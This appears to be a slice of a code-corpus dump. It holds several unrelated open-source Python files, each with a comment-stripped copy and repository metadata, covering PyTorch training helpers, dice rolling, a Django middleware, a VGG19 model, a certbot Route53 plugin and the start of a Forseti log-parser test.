def get_criterion(cfg: object) -> object:
"""Get criterion function
This is function to get criterion.
Args:
cfg: Config of criterion.
Returns:
Criterion object.
Raises:
NotImplementedError: If the criterion you want to use is not suppoeted.
"""
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss()
| 21.835616
| 79
| 0.648055
|
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss()
| true
| true
|
f719316890fdeb362381d720d148647e2cd07220
| 299
|
py
|
Python
|
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| 23
| 50
| 0.692308
|
from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| true
| true
|
f71931a377b93d7eb6f7878b5c0f35e19f2a5c5c
| 1,092
|
py
|
Python
|
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| 37.655172
| 75
| 0.772894
|
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| true
| true
|
f7193471cea625250605c013d6247623e3656276
| 482
|
py
|
Python
|
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
class DynamicMenuMiddleware:
"""
Adds a cookie to track user when navigating our website, so we can
know which part of the web did he/she came from.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| 32.133333
| 70
| 0.682573
|
class DynamicMenuMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| true
| true
|
f71935b8f3aa0244535d6d5bf915f0643fa098c5
| 5,892
|
py
|
Python
|
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
zhangziyezzy/DeepLearningMugenKnock
|
e306f436fb41b5549d0adf9ad331d638e5906e29
|
[
"MIT"
] | 10
|
2021-12-17T06:07:25.000Z
|
2022-03-25T13:50:05.000Z
|
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
karaage0703/DeepLearningMugenKnock
|
26830fe049c7da8001977ca0df12e946c0f030eb
|
[
"MIT"
] | null | null | null |
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
karaage0703/DeepLearningMugenKnock
|
26830fe049c7da8001977ca0df12e946c0f030eb
|
[
"MIT"
] | 2
|
2022-03-15T02:42:09.000Z
|
2022-03-30T23:19:55.000Z
|
import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
#---
# config
#---
cfg = EasyDict()
# class
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
# model
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
# random seed
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
# block conv1
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv2
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv3
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv4
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv5
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
# main
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19())
| 35.926829
| 102
| 0.593856
|
import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
cfg = EasyDict()
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19())
| true
| true
|
f71935de250e0719a42fab6dc8ca47d5eff65661
| 5,961
|
py
|
Python
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 4
|
2020-04-09T21:57:23.000Z
|
2020-04-11T13:26:54.000Z
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 32
|
2019-02-20T14:51:48.000Z
|
2019-02-27T10:11:34.000Z
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 3
|
2019-03-21T23:21:38.000Z
|
2020-06-23T20:56:56.000Z
|
"""Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
"""Route53 Authenticator
This authenticator solves a DNS01 challenge by uploading the answer to AWS
Route53.
"""
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation): # pylint: disable=missing-docstring
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
"""Find the zone id responsible a given FQDN.
That is, the id for the zone whose name is the longest parent of the
domain.
"""
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
# Order the zones that are suffixes for our desired to domain by
# length, this puts them in an order like:
# ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
# And then we choose the first one, which will be the most specific.
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
# Remove the record being deleted from the list of tracked records
rrecords.remove(challenge)
if rrecords:
# Need to update instead, as we're not deleting the rrset
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
"""Wait for a change to be propagated to all Route53 DNS servers.
https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
"""
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| 39.217105
| 146
| 0.610636
|
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials "
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list)
def more_info(self):
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation):
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
rrecords.remove(challenge)
if rrecords:
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| true
| true
|
f7193608cbcf5a355487e2c77d44dfda695bddce
| 5,728
|
py
|
Python
|
tests/test_stackdriver_parser.py
|
cleardataeng/forseti-policy-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 11
|
2019-04-12T21:23:49.000Z
|
2020-09-02T11:16:49.000Z
|
tests/test_stackdriver_parser.py
|
forseti-security/real-time-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 18
|
2019-04-09T16:23:03.000Z
|
2021-04-26T14:25:17.000Z
|
tests/test_stackdriver_parser.py
|
forseti-security/forseti-policy-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 11
|
2019-05-08T09:08:08.000Z
|
2021-04-26T19:23:24.000Z
|
# Copyright 2019 The Forseti Real Time Enforcer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
'''Load json data from the tests dir'''
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
# parameters for testing logs that should return a single asset
test_single_asset_log_params = [
# filename, expected_resource_type, expected_operation_type, expected_resource_name
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
# CloudSQL logs are inconsistent. See https://issuetracker.google.com/issues/137629452
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
